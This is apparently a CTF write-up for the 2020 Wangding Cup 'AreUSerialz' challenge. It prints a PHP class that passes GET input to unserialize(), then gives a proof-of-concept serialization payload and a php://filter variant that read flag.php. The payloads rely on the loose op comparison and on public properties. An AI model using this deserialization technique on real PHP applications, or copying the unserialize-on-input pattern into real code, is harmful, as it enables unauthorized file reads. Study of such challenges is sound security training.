[wangdingbei 2020 Qinglong formation]areuserialz

subject

<?phpinclude("flag.php");highlight_file(__FILE__);class FileHandler {    protected $op;    protected $filename;    protected $content;    function __construct() {        $op = "1";        $filename = "/tmp/tmpfile";        $content = "Hello World!";        $this->process();    }    public function process() {        if($this->op == "1") {            $this->write();        } else if($this->op == "2") {            $res = $this->read();            $this->output($res);        } else {            $this->output("Bad Hacker!");        }    }    private function write() {        if(isset($this->filename) && isset($this->content)) {            if(strlen((string)$this->content) > 100) {                $this->output("Too long!");                die();            }            $res = file_put_contents($this->filename, $this->content);            if($res) $this->output("Successful!");            else $this->output("Failed!");        } else {            $this->output("Failed!");        }    }    private function read() {        $res = "";        if(isset($this->filename)) {            $res = file_get_contents($this->filename);        }        return $res;    }    private function output($s) {        echo "[Result]: <br>";        echo $s;    }    function __destruct() {        if($this->op === "2")            $this->op = "1";        $this->content = "";        $this->process();    }}function is_valid($s) {    for($i = 0; $i < strlen($s); $i++)        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))            return false;    return true;}if(isset($_GET{'str'})) {    $str = (string)$_GET['str'];    if(is_valid($str)) {        $obj = unserialize($str);    }}

analysis

First you need to bypass is_invalid function ,is_valid() The function specifies the number of characters ASCII Code must be 32-125, and protected Property will appear invisible characters after serialization \00*\00, Turn into ASCII The code does not meet the requirements .

Bypass method ：PHP7.1 The above versions are not sensitive to attribute types ,public Attribute serialization will not appear invisible characters , It can be used public Property to bypass .== That is, we are finally constructing poc When , use public To modify attributes ==

First we see read() Inside file_get_contents Sensitive functions process() There is a call to read() function , On the condition that op == “2”
__destruct() Called process() function , On the condition that op!==“2”
You can see that there is a weak type problem , structure op=2 You can bypass it

<?phpclass FileHandler {    public $op=2;    public $filename="flag.php";    public $content="HappyCoder";}$a=new FileHandler();echo serialize($a);?>

Or use php Pseudo protocol to read
public $filename = "php://filter/read=convert.base64-encode/resource=flag.php";